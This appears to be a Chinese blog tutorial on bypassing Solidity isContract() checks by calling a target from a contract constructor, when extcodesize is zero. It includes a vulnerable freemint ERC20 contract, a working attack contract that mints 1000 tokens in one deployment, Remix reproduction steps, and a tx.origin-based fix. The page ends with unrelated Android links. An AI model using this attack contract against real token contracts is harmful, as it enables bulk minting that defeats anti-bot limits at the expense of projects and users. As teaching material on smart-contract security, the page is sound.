绕过合约检查

avatar
作者
猴君
阅读量:0

绕过合约检查

很多 freemint 的项目为了限制科学家(程序员)会用到 isContract() 方法,希望将调用者 msg.sender 限制为外部账户(EOA),而非合约。这个函数利用 extcodesize 获取该地址所存储的 bytecode 长度(runtime),若大于0,则判断为合约,否则就是EOA(用户)。

        // 利用 extcodesize 检查是否为合约     function isContract(address account) public view returns (bool) {         // extcodesize > 0 的地址一定是合约地址         // 但是合约在构造函数时候 extcodesize 为0         uint size;         assembly {             size := extcodesize(account)         }         return size > 0;     }

这里有一个漏洞,就是在合约在被创建的时候,runtime bytecode 还没有被存储到地址上,因此 bytecode 长度为0。也就是说,如果我们将逻辑写在合约的构造函数 constructor 中的话,就可以绕过 isContract() 检查。

漏洞例子

下面我们来看一个例子:ContractCheck合约是一个 freemint ERC20 合约,铸造函数 mint() 中使用了 isContract() 函数来阻止合约地址的调用,防止科学家批量铸造。每次调用 mint() 可以铸造 100 枚代币。

// 用extcodesize检查是否为合约地址 contract ContractCheck is ERC20 {     // 构造函数:初始化代币名称和代号     constructor() ERC20("", "") {}          // 利用 extcodesize 检查是否为合约     function isContract(address account) public view returns (bool) {         // extcodesize > 0 的地址一定是合约地址         // 但是合约在构造函数时候 extcodesize 为0         uint size;         assembly {             size := extcodesize(account)         }         return size > 0;     }      // mint函数,只有非合约地址能调用(有漏洞)     function mint() public {         require(!isContract(msg.sender), "Contract not allowed!");         _mint(msg.sender, 100);     } }

我们写一个攻击合约,在 constructor 中多次调用 ContractCheck 合约中的 mint() 函数,批量铸造 1000 枚代币:

// 利用构造函数的特点攻击 contract NotContract {     bool public isContract;     address public contractCheck;      // 当合约正在被创建时,extcodesize (代码长度) 为 0,因此不会被 isContract() 检测出。     constructor(address addr) {         contractCheck = addr;         isContract = ContractCheck(addr).isContract(address(this));         // This will work         for(uint i; i < 10; i++){             ContractCheck(addr).mint();         }     }      // 合约创建好以后,extcodesize > 0,isContract() 可以检测     function mint() external {         ContractCheck(contractCheck).mint();     } }

如果我们之前讲的是正确的话,在构造函数调用 mint() 可以绕过 isContract() 的检查成功铸造代币,那么函数将成功部署,并且状态变量 isContract 会在构造函数赋值 false。而在合约部署之后,runtime bytecode 已经被存储在合约地址上了,extcodesize > 0, isContract() 能够成功阻止铸造,调用 mint() 函数将失败。

Remix 复现

  1. 部署 ContractCheck 合约。

  2. 部署 NotContract 合约,参数为 ContractCheck 合约地址。

  3. 调用 ContractCheck 合约的 balanceOf 查看 NotContract 合约的代币余额为 1000,攻击成功。

  4. 调用NotContract 合约的 mint() 函数,由于此时合约已经部署完成,调用 mint() 函数将失败。

预防办法

你可以使用 (tx.origin == msg.sender) 来检测调用者是否为合约。如果调用者为 EOA,那么tx.originmsg.sender相等;如果它们俩不相等,调用者为合约。

function realContract(address account) public view returns (bool) {    return (tx.origin == msg.sender);}
    相关阅读
    1. 如何查看和设置我的Android N设备的权限?
    2. 如何在安卓手机上自定义应用图标?
    3. 如何在安卓微信中同时听语音和查看图片?
    4. 华为哪些设备将支持升级至安卓7.0?
    5. 微信安卓软件中Q10功能有哪些独特之处?
    6. 安卓用户如何挑选最佳视频播放器应用?
    7. 安卓系统中用户文件目录的确切位置是什么?
    8. 小米4用户如何安全升级到安卓8.0系统?
    9. 如何成功将魅蓝5升级至安卓原生7.0版本?
    10. 16GB存储的安卓手机是否能满足日常需求?

    广告一刻

    为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!